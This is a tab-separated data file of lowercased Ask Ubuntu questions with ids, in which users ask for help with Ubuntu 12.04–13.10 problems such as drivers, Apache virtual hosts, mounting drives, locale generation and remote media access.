429594	remote access media library	i have a very large media library on my home computer ( 12.10 ) that i want to access on my laptop ( 13.04 ) from work/wherever i am . it 's too big to keep a second a copy on my laptop via some sort of sync/backup service , so i need an network-based solution . to through a wrench in the works , i want to be able to edit metadata , rate songs , etc , all of which update the files on my home computer ( this rules out options like google play music ) . i strongly believe the solution i 'm look for will have one of the two following flavors : a . ) a remote desktop client that supports audio streaming . teamvewer has no audio support whatsoever and splashtop costs $ 2/month for remote access ( although it does support audio ) . b . ) setting up some sort of file server on my home computer ( possibly a virtual machine of ubuntu server ? ) . then setting it up so that my media folder appears as an external drive on my laptop . my networking knowledge is rather limited , so it 's possible throw a third type of solution i 'm unaware of . any help on the matter would be most appreciated .
429595	i want to move the top bar to the bottom in linux 13.10	someone can help me plz ? i want to move the top bar to the bottom in linux 13.10 and i ca n't find the way : /
429596	how to choose the vga when setting up the x server ?	i have 2 options of vga : lspci | grep vga 00:02.0 vga compatible controller : cirrus logic gd 5446 00:03.0 vga compatible controller : nvidia corporation gk104gl [ grid k520 ] ( rev a1 ) it 's an instance of ubuntu running on amazon ec2 . when i open my xserver i get the following message : ( ww ) cirrus : more than one matching device section found : autoconfigured video device cirrus in fact the x server gets open and it works . but with the resources of the `` cirrus logic '' . i wan na be able to choose the vga i want when open the x server . how do i do that ? ps : the final goal here is to use opengl of nvidia . this is an ubuntu running on amazon aws . it has gpu so it 's supposed to have a way for me to use opengl on it . ps2 : disable the cirrus vga is also very welcome . is there a way to do that ?
429597	gnome 3.12 compatibility with gnome 13.1	i just wanted to ask , does the new gnome release fix the compatibility issues that are present in gnome 3.1 for ubuntu 13.10 ? i ca n't stand unity desktop but i put off installing gnome 3.10 because when i tried it , i had a few issues that resulted in me having to re-install the os to fix ( i.e . vanishing mouse for example ) .
429598	ubuntu 13.10 install php-fpm with apache 2.4	i tried multiple tutorials on how to install php-fpm ( cgi ) with apache2 . none of them worked with 13.10 . i even installed ubuntu completly new after each one . this is one for example : how to configure apache to run php as fastcgi on ubuntu 12.04 via terminal ? https : //alexcabal.com/installing-apache-mod_fastcgi-php-fpm-on-ubuntu-server-maverick/ are they too outdated ? i mean i looked for over 2 hours for one for ubuntu +13 . it would be nice if you know one that works or could explain it . i mean there is not much i could have done wrong , as it is mostly copy and paste . everything worked great , but when i check phpinfo ( ) it still shows apache2 as server api .
429599	ffmpeg | how to encode a video to make it faster	good day people , i was wondering how to encode a video from a speed of 1 x to a one of 5 x , using ffmpeg . thanks in advance for any suggestion .
429601	unable to mount a hard drive previously used in windows	so i have an asus laptop that i have 2 hdds in and i just uninstalled windows ( probably going to install in dual boot later , maybe not ) but i backed up all my important data to my secondary hdd . now , in ubuntu , i ca n't access it , the error code is something like '' contains an unclean file system ( 0,0 ) . metadeta kept in windows cache , refused to mount , operation not permitted , please resume and shutdown windows fully ( no hibernation or fast restarting ) ... '' does anyone have any ideas on how i can fix this , preferrably without installing windows again ?
429606	installing amd catalyst 13.12 64 bit	i have an amd e1-1200 processor on my computer . after trying to install the current amd catalyst ( 13.12 ) drivers , my computer 's display would n't work and i would boot into command prompt . i of course had to uninstall the drivers , and i managed to get back up and running . this is apparently , a common issue with catalyst 13.12 . if you want to see my error log you can find it here . i went on here to look for tutorials of how to install catalyst 13.12 ( 64 bit ) on ubuntu and could n't find any solution that i could understand ( i 'm a noob ) to my problem . can anyone give me some advice to installing catalyst 13.12 properly ? thanks !
429607	how can i access blocked sites for free ?	i 'm a new ubuntu user and i live in iran . i have problems opening many sites , even google services . i can not buy a vpn account.. what can i do to access sites when access is restricted in ubuntu ?
429610	uninstall grub and use windows bootloader	i have windows 8 pre-installed and then installed grub with ubuntu . ubuntu is not my thing so now i want to remove it along with grub . from what i have learned , with uefi , grub does not overwrite the windows bootloader in the efi partition and is stored elsewhere . how would i remove grub and make my pc use the windows bootloader instead ? it should be noted that i created a seperate /boot partition when installing ubuntu .
429612	device-mapper : remove ioctl on luks-xxxx failed : device or resource busy	while i was away from my computer , my encrypted usb drive got accidentally unmounted somehow ( although it was still physically connected at the time ) . i have n't been able to recover ( have n't tried a reboot yet ) . i have now completely disconnected the device , but i still get `` device or resource busy '' when i try to remove the dangling entry in /dev/mapper . can i reconnect and mount the drive without a reboot ? here 's what i have tried ( long name changed to `` xxxxx '' ) ... $ sudo dmsetup ls luks-xxxxx ( 252:1 ) luks-yyyyy ( 252:0 ) $ sudo umount /dev/mapper/luks-xxxxx umount : /dev/mapper/luks-xxxxx : not mounted $ sudo fuser -- kill /dev/mapper/luks-xxxxx $ echo $ ? 1 $ sudo dmsetup info -c luks-xxxxx name maj min stat open targ event uuid luks-xxxxx 252 1 l -- w 1 1 0 crypt-luks1-xxxxx-luks-xxxxx $ sudo dmsetup remove luks-xxxxx device-mapper : remove ioctl on luks-xxxx failed : device or resource busy command failed after reconnecting the device ... $ sudo cryptsetup luksopen `` /dev/sde1 '' `` luks-xxxxx '' device luks-xxxxx already exists . [ edit ] i solved the problem , this time , by closing a gui text editor which had no open files , but had been launched from a folder on the device in question . so the question becomes more specific : how can you identify which application is holding the device open ? bear in mind that lsof does n't seem to present an easy solution because , once the device is disconnected , the associated names provided by lsof no longer include the name of the disconnected device .
429614	notificaciones de ufw	anterior utilize gufw y firestater ellos me daban notification de conneciones no desea a puertos y/o cualquier tipo de accion que no yo no quiciera pero estoy avanzando a ufw ( la base y no logro ponerlo a hacer este tipo de funcion
429615	double icons in task bar , other icons do n't stay	i am using lubuntu ( operating system : ubuntu 13.10 ) . i have double icons for network connections/wifi on the taskbar by clock . how do i get it to one ( merge them ) , it seems like duplicates ? fyi this did not work-two wifi icons in panel additionally , the xfce4-power-manager 1.2.0 icon is set to stay on for power manager and each time i boot it does not stay on . its in this screen shot but each time i reboot it goes away neither does the hp printer device manager icon for hplip-3.14.1 does n't stay on either . last the power button/logoff button is missing as it was originally there in the right taskbar/panel note : hplip had a software update to 3.14.3 and since then my hp and xfce power manager icon now comes on . still do n't know about the double icons though ... this post and help by stormvirux got me back to the original config of taskbar with the power button back-but still have the double wifi icons- restore shutdown button on taskbar ? how do you restore desktop taskbar in lubuntu ?
429621	ubuntu only shows 2.7 gb of ram , i have 4 gb !	okay friends i am brand-spankin-new to ubuntu , i duel booted it with windows vista 32 bit , in vista i also only show 2.7 gb through internet research i have concluded that that was because i had the 32-bit version of vista . ubuntu on the other hand is 64-bit . bios knows that i have 4 gb how can i get ubuntu to learn that fact too ?
429622	failed to download repository information , problem with software & updates ?	i think this is an original problem , as all suggested solutions i can find online have failed . i 'm running ubuntu 13.10 . i am a very new linux user , but i 'll try to decipher comments . the problem : i just installed ubuntu . when i try to run sudo apt-get update , i get the response `` the method driver /usr/lib/apt/methods/https could not be found . '' as suggested on a separate feed , i tried sudo apt-get install apt-transport-https . it says that it ca n't find that package . i tried to install nano , something i briefly read about . it could n't find that package . i opened software & updates , and set it to download from best server . that did n't change anything . it seems any solution i try leads to `` failed to download repository information '' or `` can not find package , '' which leads to `` the method driver etc etc . '' do you guys have any idea what the problem is and how i can fix it ? i feel like it there should n't be an s at the end of /usr/lib/apt/methods/http . what could i gedit to fix this ? aha . i was able to manually install apt-transport-https and now update works . there must be something wrong with my software & updates settings , dang . thanks anyway !
429623	would a usb nic work with ubuntu server 12.04.4 lts ?	i 'd like to state first off that i 'm new to linux and am still learning the ropes . i recently installed ubuntu server 12.04.4 lts on a dell poweredge 1800 . i also installed the xfce 4 desktop environment . i intend to install clonezilla server next . however , the system only has an onboard nic and i do n't have any pci nics available . i know that at a minimum two physical nics are recommended when setting up a clonezilla server . will the ubuntu server operating system accept a usb nic ?
429630	prefer home wifi network over mobile broadband wifi	i have 2 wifi sources : home wifi , unlimited . mobile broadband wifi , limited . i want to use it only when there is no other choice . how to set networkmanager to switch from mobile wifi as soon as home wifi is within reach ? deactivating mobile broadband wifi as soon as i enter home is not a good solution , as it would take too much time , i go in and out very often . a fork of networkmanager could be a solution , even if it involves hard-coding .
429631	subdomains with apache2	i having trouble getting my first subdomain to work with apache2 . my primary domain is setup in 000-default.conf as < virtualhost example.org:80 > servername www.example.org serveralias example.org serveradmin webmaster @ localhost documentroot /var/www scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all require all granted < /directory > errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > and my second site as < virtualhost pastebin.example.org:80 > servername www.pastebin.example.org serveralias pastebin.example.org serveradmin webmaster @ localhost documentroot /var/sticky-notes < directory `` /var/sticky-notes '' > allowoverride none order allow , deny allow from all require all granted < /directory > errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > for some reason , when i try to access pastebin.example.org , i get a 403 forbidden error saying i do n't have permission to access '/ ' .
429634	how to install ms office 2010 in virtual box windows vm	i have installed a virtual machine on my ubuntu 13.10 ( saucy salamander ) laptop using virtualbox . i have also installed windows 7 professional . i need to be able to access ms office 2010 using the virtual machine . how do i do this ? do i need to install wine and then download ms office 2010 ? if so , how do i then access ms office 2010 from virtualbox ? do i open wine from virtualbox and access through wine ? yikes ! i am so confused ! melodee
429639	libpcl issues on ubuntu 13.10	i wanted to install the point cloud library but it does not work i use an odroid board ( arm processor ) some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libpcl-all : depends : libpcl-1.7-all but it is not going to be installed e : unable to correct problems , you have held broken packages . by compiling v1.7 , i get these errors : /usr/lib/gcc/arm-linux-gnueabihf/4.8/../../../arm-linux-gnueabihf/libpthread.a ( ptw-fcntl.o ) : in function `__fcntl_nocancel ' : /build/buildd/eglibc-2.17/nptl/../sysdeps/unix/sysv/linux/i386/fcntl.c:37 : undefined reference to `__libc_do_syscall' /usr/lib/gcc/arm-linux-gnueabihf/4.8/../../../arm-linux-gnueabihf/libpthread.a ( ptw-fcntl.o ) : in function `__libc_fcntl ' : /build/buildd/eglibc-2.17/nptl/../sysdeps/unix/sysv/linux/i386/fcntl.c:53 : undefined reference to `__libc_do_syscall' /build/buildd/eglibc-2.17/nptl/../sysdeps/unix/sysv/linux/i386/fcntl.c:57 : undefined reference to `__libc_do_syscall' /usr/lib/gcc/arm-linux-gnueabihf/4.8/../../../arm-linux-gnueabihf/libpthread.a ( ptw-open64.o ) : in function `__libc_open64 ' : /build/buildd/eglibc-2.17/nptl/../sysdeps/unix/sysv/linux/open64.c:41 : undefined reference to `__libc_do_syscall' /build/buildd/eglibc-2.17/nptl/../sysdeps/unix/sysv/linux/open64.c:45 : undefined reference to `__libc_do_syscall' /usr/lib/gcc/arm-linux-gnueabihf/4.8/../../../arm-linux-gnueabihf/libpthread.a ( cancellation.o ) : /build/buildd/eglibc-2.17/nptl/cancellation.c:96 : more undefined references to `__libc_do_syscall ' follow collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ bin/pcl_convert_pcd_ascii_binary ] error 1 make [ 1 ] : *** [ io/tools/cmakefiles/pcl_convert_pcd_ascii_binary.dir/all ] error 2 make : *** [ all ] error 2 i could not find anything in google to solve these errors i believe some packages were not ported for arm processors any help would be appreciated $ dpkg -- list | grep headers ii linux-headers-3.0.63-odroidx2 20130215 ii linux-headers-3.0.71-odroidx2 20130415 ii linux-headers-3.0.74-odroidx2 20130417 ii linux-headers-3.0.75-odroidx2 20130426 ii linux-headers-3.1.10-6 3.1.10-6.10 ii linux-headers-3.1.10-6-ac100 3.1.10-6.10 ii linux-headers-ac100 3.1.10.6.2 installing packages did'nt do well sudo apt-get install linux-generic [ sudo ] password for odroid : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : debugedit libasound2-dev libestools2.1-dev librpmbuild3 librpmsign1 thunderbird-locale-en thunderbird-locale-en-gb thunderbird-locale-en-us thunderbird-locale-ko use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-3.11.0-17 linux-headers-3.11.0-17-generic linux-headers-generic linux-image-3.11.0-17-generic linux-image-generic suggested packages : fdutils linux-doc-3.11.0 linux-source-3.11.0 linux-tools the following new packages will be installed : linux-generic linux-headers-3.11.0-17 linux-headers-3.11.0-17-generic linux-headers-generic linux-image-3.11.0-17-generic linux-image-generic 0 upgraded , 6 newly installed , 0 to remove and 0 not upgraded . need to get 58.2 mb of archives . after this operation , 203 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ports.ubuntu.com/ubuntu-ports/ saucy-updates/main linux-image-3.11.0-17-generic armhf 3.11.0-17.31 [ 44.5 mb ] get:2 http : //ports.ubuntu.com/ubuntu-ports/ saucy-updates/main linux-image-generic armhf 3.11.0.17.18 [ 2,356 b ] get:3 http : //ports.ubuntu.com/ubuntu-ports/ saucy-updates/main linux-headers-3.11.0-17 all 3.11.0-17.31 [ 12.6 mb ] get:4 http : //ports.ubuntu.com/ubuntu-ports/ saucy-updates/main linux-headers-3.11.0-17-generic armhf 3.11.0-17.31 [ 1,128 kb ] get:5 http : //ports.ubuntu.com/ubuntu-ports/ saucy-updates/main linux-headers-generic armhf 3.11.0.17.18 [ 2,350 b ] get:6 http : //ports.ubuntu.com/ubuntu-ports/ saucy-updates/main linux-generic armhf 3.11.0.17.18 [ 1,726 b ] fetched 58.2 mb in 13s ( 4,379 kb/s ) selecting previously unselected package linux-image-3.11.0-17-generic . ( reading database ... 258618 files and directories currently installed . ) unpacking linux-image-3.11.0-17-generic ( from ... /linux-image-3.11.0-17-generic_3.11.0-17.31_armhf.deb ) ... examining /etc/kernel/preinst.d/ done . selecting previously unselected package linux-image-generic . unpacking linux-image-generic ( from ... /linux-image-generic_3.11.0.17.18_armhf.deb ) ... selecting previously unselected package linux-headers-3.11.0-17 . unpacking linux-headers-3.11.0-17 ( from ... /linux-headers-3.11.0-17_3.11.0-17.31_all.deb ) ... selecting previously unselected package linux-headers-3.11.0-17-generic . unpacking linux-headers-3.11.0-17-generic ( from ... /linux-headers-3.11.0-17-generic_3.11.0-17.31_armhf.deb ) ... selecting previously unselected package linux-headers-generic . unpacking linux-headers-generic ( from ... /linux-headers-generic_3.11.0.17.18_armhf.deb ) ... selecting previously unselected package linux-generic . unpacking linux-generic ( from ... /linux-generic_3.11.0.17.18_armhf.deb ) ... setting up linux-image-3.11.0-17-generic ( 3.11.0-17.31 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) cp : can not stat â/boot/initrd.img-3.11.0-17-genericâ : no such file or directory failed to copy /boot/initrd.img-3.11.0-17-generic to /boot/initrd.img at /var/lib/dpkg/info/linux-image-3.11.0-17-generic.postinst line 730. dpkg : error processing linux-image-3.11.0-17-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.11.0-17-generic ; however : package linux-image-3.11.0-17-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured setting up linux-headers-3.11.0-17 ( 3.11.0-17.31 ) ... no apport report written because maxreports is reached already no apport report written because maxreports is reached already setting up linux-headers-3.11.0-17-generic ( 3.11.0-17.31 ) ... examining /etc/kernel/header_postinst.d . setting up linux-headers-generic ( 3.11.0.17.18 ) ... dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.11.0.17.18 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.11.0-17-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i had to uninstall these cos they were messing up other packages installation ( buildessentials were already installed )
429640	where to find a kingston pen drive in .config file	i was checking the .config file in the /usr/src/linux folder . 1.i was searching the name for my usb flash drive i could n't find . by what name will it be there ? 2.what happens if i copy the .config file to /boot folder ? tx .
429646	running in a vm . how can i access the host computer 's files ?	i 'm running ubuntu in a vm , which is running on a win7 host . how can i access the host computer 's files ?
429647	set up socks5 proxy on 2nd ip	i have a server with a 2nd ip , which i would like to use as a socks5 proxy . however , i do n't want to use the main server ip as the proxy . for example , if the main ip was 1.1.1.1 , and the secondary ip was 2.2.2.2 , i want the socks proxy to listen on 2.2.2.2 and make connections using the 2.2.2.2 ip . how would i go about doing this ? i know that you can do ssh -n -d 0.0.0.0:1080 localhost to set up a quick n dirty proxy . however , i do n't know if it can be made to use the second ip on my server . thanks in advance , i really appreciate it !
429648	how to use a folder in a network drive as workspace in eclipse	i 've been trying for some time to mount a windows share and use that as a workspace in eclipse . i finally successfully mounted ( it 's way more complicated than it needs to be i feel ) using this method . still when i open it up select it as my workspace ( which only works if i mount it in my home directory ) and then try to run a program i get this error : error : could not find or load main class edu.uwec.cs.carpenne.lab4.arrays is this an eclipse problem or is there still some problem with how the drive is mounted . thanks for the help !
429649	what if i remove .config file from the linux source	i was just curious whether i can remove the .config file . actually i am learning how to edit the config ( from make menuconfig ) and recompile the kernel . so if i remove the .config file from the source ( /usr/src/linux ) how does it affect ? i am learning from this link
429652	is there an app for screen recoding with pip ( picture in picture )	i 'm looking for a screencast software that can record my screen and my face ( using my webcam ) in a picture-in-picture ( you know , that secondary video in a small rectangle in the corner of the screen ) .
429656	error for make-kpkg clean	when i tried make-kpkg clean it shows the following error : exec make kpkg_version=12.036+nmu2 -f /usr/share/kernel-package/ruleset/minimal.mk clean ====== making target minimal_clean [ new prereqs : ] ====== this is kernel package version 12.036+nmu2 . test ! -f .config || cp -pf .config config.precious test ! -e stamp-building || rm -f stamp-building test ! -f makefile || \ make arch=i386 distclean make [ 1 ] : entering directory /usr/src/linux-headers-3.8.0-36-generic /usr/src/linux-headers-3.8.0-36-generic/ubuntu/aufs/makefile:2 : ubuntu/aufs/magic.mk : no such file or directory make [ 3 ] : *** no rule to make target ubuntu/aufs/magic.mk . stop . make [ 2 ] : *** [ ubuntu/aufs ] error 2 make [ 1 ] : *** [ _clean_ubuntu ] error 2 make [ 1 ] : leaving directory /usr/src/linux-headers-3.8.0-36-generic make : *** [ minimal_clean ] error 2
429661	error while running eclipse with adt bundle in kubuntu	i am running my eclipse juno that comes along with adt bundle and i am facing problems my eclipse gets crashed and stops many times and i dont know why but i am getting errors which are shown in the link below . https : //textb.org/t/okz9ivej9j/ more to add error displays : - ' can not run program `` [ myfilepath ] /sdk/platform-tools/adb '' : error=2 , no such file or directory ' while attempting to get adb version from [ myfilepath ] /sdk/platform-tools/adb â
429662	error on mounting btrfs volume on precise	i use a 12.04 ( precise ) fully updated ( kernel 3.2.0-58-generic x86_64 ) . in other partitions , i installed the ubuntu 14.04 trusty ( alpha version ) to try out . i ca n't boot into the trusty system any more . i guess it 's something related with some grub configuration i modified or some error in booting the root partition ( / ) . i want to access some file in the /home , which is a btrfs partition over luks . i can open the device in luks , but when i try to mount it in the precise , i get some error . this is what it outputs to the dmesg : btrfs : disk space caching is enabled btrfs : could n't mount because of unsupported optional features ( 60 ) . btrfs : open_ctree failed i tried to mount as read-only but it did n't work also . does someone how could i access this from the precise ? i 'll need this so much when i began to change from my old precise to the trusty install later .
429663	static ip error in ubuntu 12.04.03 lts	i am getting the following message after changing dhcp to start with the following settings : address 192.168.1.24 network mask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 *running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces *reconfiguring network interfaces ... what does deprecated mean ? i have searched the blogs and none is helping
429673	followed directions to use pendrivelinux but it does not support windows8 for usb creation	i am running windows8.1 on asus zenbook . wanted to test run ubuntu 12.04lts , but am complete nubie to linux so want to run from usb . i formatted the usb in windows . do i need to format it for linux ? then went to the pendrive site from button on ubuntu.com . it downloaded files to my download folder . since i had a virus on win8 , was leary about the whole download folder , but ca n't change it to load direct to usb in pendrive . is there a place i can ? when i unzipped the folder contents it hung after a very long time , and found over 300 errors : ''file is broken '' . it did seem to unpack many ubuntu files to usb , but i did not try to run it after reading other peoples ' problems with broken files . is there another way to get the 12.04 lts onto the usb drive besides pendrive ? i tried every tutorial and button i could find on the ubuntu site and the wiki site they directed me to . no help . got referred to ''alternate cd '' directions , for windows7 not 8.1 . i really want to try it , but am worried about my lack of tech expertise in ubuntu .
429674	trap the shutdown event of ubuntu system	i have ubuntu system and i want to check the condition before the system goes off means system get shutdown . if condition is satisfied then allow to shutdown the system otherwise halt the shutdown event . if any command is there on ubuntu then please tell me . so please advice me
429675	guymager device disconnected , acquisition paused	an external sd card is connected to precise penguin via usb . the device mounts and is recognized by guymager . image cloning commences for a few seconds with data transferred but then the process halts with the following error : device disconnected , acquisition paused this happens repeatedly . the physical connection is solid , i believe . perhaps the device dismounts for some reason .
429687	bug caused during installing genymotion emulator	i have tried to install genymotion android emulator but i am stuck at a point after downloading the file from geny motion site . i tried to install it from terminal by typing chmod +x genymotion-2.1.1_x64.bin it throws an error : chmod : can not access âgenymotion-2.1.1_x64.binâ : no such file or directory can someone please help me ?
429690	how do i fix my screen resolution ?	i 'm using ubuntu 12.04.4 ( not a vm ) . i have my display for my monitor at a full 1080p ( which it supports ) . all icons and images look amazing . everything is crisp . my display is currently at 1920x1080 ( 16:9 ) , but my monitor is n't completely `` fullscreen '' . i 'm missing about 1 inch around every corner . potentially i could `` downgrade '' my resolution to 1680x1050 ( 16:10 ) , but this does not fix the issue i 'm having . the only thing i could think of myself ( i just started using ubuntu 2 days ago ) is to somehow force a 16:10 aspect ratio . this probably is such an easy fix for experienced people . please and thank you for answering .
429691	issue accessing dropbox	whenever i try to access dropbox from my linux booted partition , it just keeps on trying to get the information from the website and displays a blank page . it works perfectly in my windows partition though . ca n't seem to figure out what goes wrong in here . here is a screenshot from my browser .
429693	what is vlc-nox ?	at the time time of installing vlc on my laptop i entered the command in terminalvlc.and then it says the ` program vlc is not currently installed you can install it by typing sudo apt-get install vlc-nox . but instead i just typed sudo apt-get install vlc so , my question is what is vlc-nox ? ? is it different from vlc ? ?
429694	ca n't print in black with epson stylus bx525dw	i have installed an ethernet connected epson stylus bx525dw printer . i can print in colours and i can scan documents . installation was automatic . it took me 10 seconds . however i ca n't print in black . note that the inks are not the original . i bought inks from ebay . however , the same printer was printing in black in windows before . although black is almost grey ( inks are of terrible quality , that is a fact ) . these are my cups settings : < printer epson-stylus-office-bx525wd > uuid urn : uuid:3d09dd67-c833-36e8-4cd7-a5b90c67b7da info epson epson stylus office bx525wd makemodel epson stylus office bx535wd - cups+gutenprint v5.2.9 deviceuri lpd : //192.168.1.4:515/passthru state idle statetime 1393924901 type 8425484 accepting yes shared yes jobsheets none none quotaperiod 0 pagelimit 0 klimit 0 oppolicy default errorpolicy retry-job attribute marker-colors \ # 000000 , # ff00ff , # ffff00 , # 00ffff attribute marker-levels 100,100,100,100 attribute marker-names black ink cartridge , magenta ink cartridge , yellow ink cartridge , cyan ink cartridge attribute marker-types inkcartridge , inkcartridge , inkcartridge , inkcartridge attribute marker-change-time 1393924901 < /printer > can i fix this ? ( i am using ubuntu 12.10 )
429698	stop : unknown instance : networking stop/waiting ubuntu server 12.04.3	i am getting the following msg after restarting networking services stop : unknown instance : networking stop/waiting in ubuntu server 12.04.3 what does lt mean ? however i am able to ping my dns and sites . can i go ahead and install samba or i might get problems later because of this error . please help !
429700	can i install ubuntu in to virtual box android ?	hello i am linux developer and have ubuntu os in my desktop . and i created application for ubuntu and android . i have android that installed on genymotion virtual os . can i install ubuntu mobile os on virtual android on genymotion ? ?
429703	python-pypdf package removal	on 13.10 , i tried installing the package python-pypdf . i got an error during installation , and ca n't get ride of it . i tried sudo dpkg -- remove python-pypdf and sudo dpkg -- purge python-pypdf and sudo apt-get -f install i always get an error like paramétrage de python-pypdf ( 1.13-1 ) ... traceback ( most recent call last ) : file `` /usr/sbin/update-python-modules '' , line 449 , in < module > shutil.rmtree ( dir ) file `` /usr/lib/python2.7/shutil.py '' , line 232 , in rmtree onerror ( os.path.islink , path , sys.exc_info ( ) ) file `` /usr/lib/python2.7/shutil.py '' , line 230 , in rmtree raise oserror ( `` can not call rmtree on a symbolic link '' ) oserror : can not call rmtree on a symbolic link dpkg : erreur de traitement de python-pypdf ( -- configure ) : le sous-processus script post-installation installé a retourné une erreur de sortie d'état 1 des erreurs ont été rencontrées pendant l'exécution : python-pypdf e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea on how i may fix this ?
429704	grey screen on upgrading ubuntu !	you may get this after upgrading to latest version of ubuntu . if so please logout or force restart your system if nothing works . then select ubuntu recovery mode . from there select repair broken packages ... ie the dpkg command . hope this works ... it has worked for me ! ! !
429705	what is dolphin ?	i am using ubuntu 12.04lts and i was just going through the applications scope and i saw an application called dolphin and it looked like the home folder ( nautilus file manager ) . so when i opened it the heading was jatin - 'dolphin ' . and it looked like this can anyone tell me what it is ? i am new to ubuntu and i do n't know much terms so please try and explain in easy language .
429707	does ubuntu make computer heat up more than windows ?	i have a dell inspiron 17r 5721 for a year now and i mostly use ubuntu 12.04 . i had heating problems sine the beginning while i was using ubuntu but by trial and error i managed to decrease it to logical levels , that is 60c when idle and sometimes even bellow that . lately tho , i 've had real problems with the heat going up to 90c and more if i did n't turn off the apps/games that i used at the time . my fan has a problem and i 'm waiting on dell to fix that but ... until that happens i 'm in windows where the heat is much less in normal conditions , on computer startup is at 40-48c and if i try to do stuff ( watch videos , surf on the internet ) the heat is at 50-56c . so the question is `` does linux cause more heat than windows in general '' ? i love ubuntu but i do n't want to sepnd another 1k euros any time soon . as i said i only have this laptop for a year and i hope that it 'll live longer .
429711	confusion about overlay filesystem in ubuntu	suppose some commands below : mkdir -p /tmp/rootfs mkdir -p /tmp/rootfs1 mkdir /mnt mount -n -t overlayfs -o rw , upperdir=/tmp/rootfs , lowerdir=/tmp/rootfs1 none /mnt as a result , i can see everything of /rootfs and /mnt/rootfs1 in /mnt . besides , when i add something in /mnt , i can see them in /tmp/rootfs , but ca n't see them in /tmp/rootfs1 . what 's more , if i delete something in /mnt , it would be deleted in all of the directories . i wonder why ? i want to know the relationship between /tmp/rootfs , /tmp/rootfs1 and /mnt . ps : i am not satisfied with the answer here , how do i use overlayfs ?
429716	how to run a command or script at screen lock/unlock ?	i am looking for a way to store lock/unlock screen times . a= $ ( date ) echo $ a > > $ home/time_xprofile what did i try : $ home/.bashrc $ home/.bash_logout $ home/.bash_prompt $ home/.xprofile then i locked the screen and checked whether file appeared and it failes every time . how can i check the time than ?
429717	locale-gen segmentation fault	i 'm trying to generate locales , but locale-gen ( localedef ? ) segfaults . # sudo dpkg-reconfigure locales perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = `` en_us.utf-8 '' , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /bin/bash : warning : setlocale : lc_all : can not change locale ( en_us.utf-8 ) generating locales ... en_us.iso-8859-1 ... /usr/sbin/locale-gen : line 177 : warning : setlocale : lc_all : can not change locale ( en_us.utf-8 ) /usr/sbin/locale-gen : line 243 : 3809 segmentation fault localedef $ no_archive -i $ input -c -f $ charset $ locale_alias $ locale failed en_us.utf-8 ... /usr/sbin/locale-gen : line 177 : warning : setlocale : lc_all : can not change locale ( en_us.utf-8 ) /usr/sbin/locale-gen : line 243 : 3836 segmentation fault localedef $ no_archive -i $ input -c -f $ charset $ locale_alias $ locale failed generation complete . in top i see localedef -i en_us -c -f iso-8859-1 en_us taking up 8000g of virtual memory , then some huge number without even g suffix and then segfault . system has 1g memory and 512mb swap , but memory is barely used ( 130mb at peak of generation ) . system data : root @ docs : ~ # uname -a linux docs 2.6.32-042stab078.28 # 1 smp mon jul 8 10:17:22 msk 2013 x86_64 x86_64 x86_64 gnu/linux root @ docs : ~ # cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.4 lts '' root @ docs : ~ # dpkg-query -- show glibc* glibc-2.13-1 glibc-doc root @ docs : ~ # sudo apt-get update & & sudo apt-get upgrade ... skipped ... 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
429722	`` gomaasapi : got error back from server : 403 forbidden '' error while bootstrapping	i am investigating maas with juju on ubuntu 12.04.4 lts . ( also tried 13.10 ... ) i have set up my server ( s ) using various tutorials , but i keep getting 403 errors when bootstrapping juju . i have tried it as root and as the local administrator ( i created them both in the os and in the web ui for maas . also i used the proper keys in the corresponding .juju/environments.yaml ) . everytime i keep getting 2014-03-04 15:20:50 error juju supercommand.go:282 can not start bootstrap instance : gomaasapi : got error back from server : 403 forbidden errors . is there anyone who can give me a clue , so i can continue my installation ? setup information : ubuntu 12.04.4 lts maas 1.4+bzr1693+dfsg-0ubuntu2.2~ctools0 juju 1.16.6
429725	how can i restart correctly the whole unity interface from the commandline ?	often , i stumble upon some small compiz bug or corruption in the screenoutput . when that happens i run unity -- replace from a vty . that fixes it , but reloading unity in this way makes the global menu bar disappear ( every window thus gets its own menu bar ) as well as the system tray ( the one with date , sound , system menus ) . i guess that telling them through dbus to connect to the new unity process might work , or alternatively kill and restart their processes . i just discovered that i can get back the system tray/panel by launching /usr/lib/unity/unity-panel-service ( i wonder why this is n't restarted by unity -- replace ) , but this still leaves the global menu missing .
